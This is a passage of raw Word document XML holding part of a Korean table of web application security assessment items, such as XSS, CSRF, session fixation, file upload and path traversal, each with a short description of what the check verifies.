          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="630A133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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14913C5E"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디렉터리 인덱싱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22C5ABE1" w14:textId="7ED808C9"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Pr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>웹</w:t>
            </w:r>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 서버 구조 노출뿐만 아니라 백업 파일이나 소스</w:t>
            </w:r>
            <w:r w:rsidR="0008436C">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파일, 공개되어서는 안</w:t>
            </w:r>
            <w:r w:rsidR="0008436C">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되는 파일 등에 대해 목록 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="798C9957" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="347F010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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="075733F3" w14:textId="77777777" w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w:rsidRDefault="000B7CBB" w:rsidP="004D3796">
            <w:pPr>
              <w:widowControl/>
              <w:overflowPunct w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>정보 누출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3770B2EA"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2E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>웹/앱에서 사용자와 관련되거나 서버에 관련된 정보를 노출 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="35DC70C8" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21E392B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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="328171D8" w14:textId="77777777" w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w:rsidRDefault="000B7CBB" w:rsidP="004D3796">
            <w:pPr>
              <w:snapToGrid/>
              <w:spacing w:beforeLines="10" w:before="24" w:afterLines="10" w:after="24" w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>악성 콘텐츠</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AF937BF"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2E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">게시판 등에 악성 </w:t>
            </w:r>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>콘텐츠</w:t>
            </w:r>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 삽입 및 실행 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="2F6BD514" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64DF6CB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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A59997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크로스사이트 스크립팅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A606769" w14:textId="77777777" w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w:rsidRDefault="000B7CBB" w:rsidP="004D3796">
            <w:pPr>
              <w:widowControl/>
              <w:overflowPunct w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid/>
              <w:jc w:val="left"/>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악의적인 사용자가 공격하려는 사이트에 스크립트를 넣는</w:t>
            </w:r>
            <w:r>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공격</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="5D398233" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56DA210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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0930FACF"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약한 문자열 강도</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="371289B4"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웹페이지 내 로그인 폼 등에 약한 강도의 문자열 사용 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="78C21462" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0244C722"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2398065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인증</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A383125"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중요 페이지 접근 시 추가 인증 요구 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="1FB11125" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4894D96E"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1166251C"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취약한 패스워드 복구</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16AA55F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 내 패스워드 복구 절차의 적절성 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="6FEBBAAC" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66EB6A3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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7055CB04"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크로스사이트 리퀘스트 변조(CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="265A43E7"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사용자가 자신의 의지와 무관하게 공격자가 의도한 요청을 웹 서버에 전송하도록 만드는 공격</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="357385F9" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41655CC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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A642A5"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세션 예측</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D579EC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단순한 방법(연속된 숫자 할당 등)으로 생성되는 세션 ID를 예측하여 세션 탈취 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="1C266AED" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BE76C16"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="682A5E8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인가</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C797FBE"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민감한 데이터</w:t>
            </w:r>
            <w:r>
              <w:t>·</w:t>
            </w:r>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>기능에 접근 및 수정 시 통제 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="2F8B9F40" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08E0C3D8"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C5DC5C"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세션 만료</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA3735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세션의 만료 기간 설정 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="6D874DED" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A693644"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51538447"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세션 고정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C066CC4"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 로그인 시 항상 일정하게 고정된 세션 ID 값을 발행하는지 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="36EE02EF" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AC57C2C"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b/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0539A697"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자동화 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FB8930D"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애플리케이션의 특정 프로세스(로그인 시도, 게시글 등록, SMS 발송 등)에 대한 반복적인 요청 시 통제 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="3BC958C8" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63F360E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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AD9E5E6"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프로세스 검증 누락</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="645569D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인증이 필요한 웹 사이트의 중요(관리자 페이지, 회원변경 페이지 등) 페이지에 대한 접근제어 설정 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="0EE81F33" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="365FD30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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="152FED1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파일 업로드</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA6751F"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사이트의 게시판, 자료실 등에 조작된 Server Side Script 파일 업로드 및 실행 가능 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="62C3FC0E" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A01A172"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B9B7BEA"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파일 다운로드</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06ED9043" w14:textId="0B55E0CE"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사이트에서 파일 다운로드 시 허용된 경로 외 다른 경로의 파일 접근이 가능 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="3BAB4AF3" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13A99B4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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CB5AAE2"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관리자 페이지 노출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="106988A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유추하기 쉬운 URL로 관리자 페이지 및 메뉴 접근의 가능 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="0C48E627" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35672A8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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51D7B6F0"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경로 추적</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B9207F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서버와 웹 애플리케이션의 파일 또는 디렉터리의 접근 통제 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="39C66A55" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63B221F5"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43CDB242"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위치 공개</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="453C6A4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예측 가능한 폴더의 위치 사용 여부 및 불필요한 파일의 존재 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="48C22D68" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BEA035E"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B8FE160"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데이터 평문 전송</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49C5EA8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서버와 클라이언트 간 통신 시 데이터의 암호화 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="5551796A" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C54C0C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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A737B03"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쿠키 변조</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B430631" w14:textId="77777777" w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w:rsidRDefault="000B7CBB" w:rsidP="000B7CBB">
            <w:pPr>
              <w:keepNext/>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쿠키 사용 여부 및 사용하는 경우 안전한 알고리즘으로 암호화 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F189E41" w14:textId="6DF9722F" w:rsidR="000B7CBB" w:rsidRDefault="000B7CBB" w:rsidP="000B7CBB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc206630344"/>
      <w:bookmarkStart w:id="50" w:name="_Toc206630482"/>
      <w:bookmarkStart w:id="51" w:name="_Toc209094669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>표</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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5</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000B7CBB">
        <w:t>. 주요 진단 항목</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="2A3EE7E1" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="00B75ECF">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
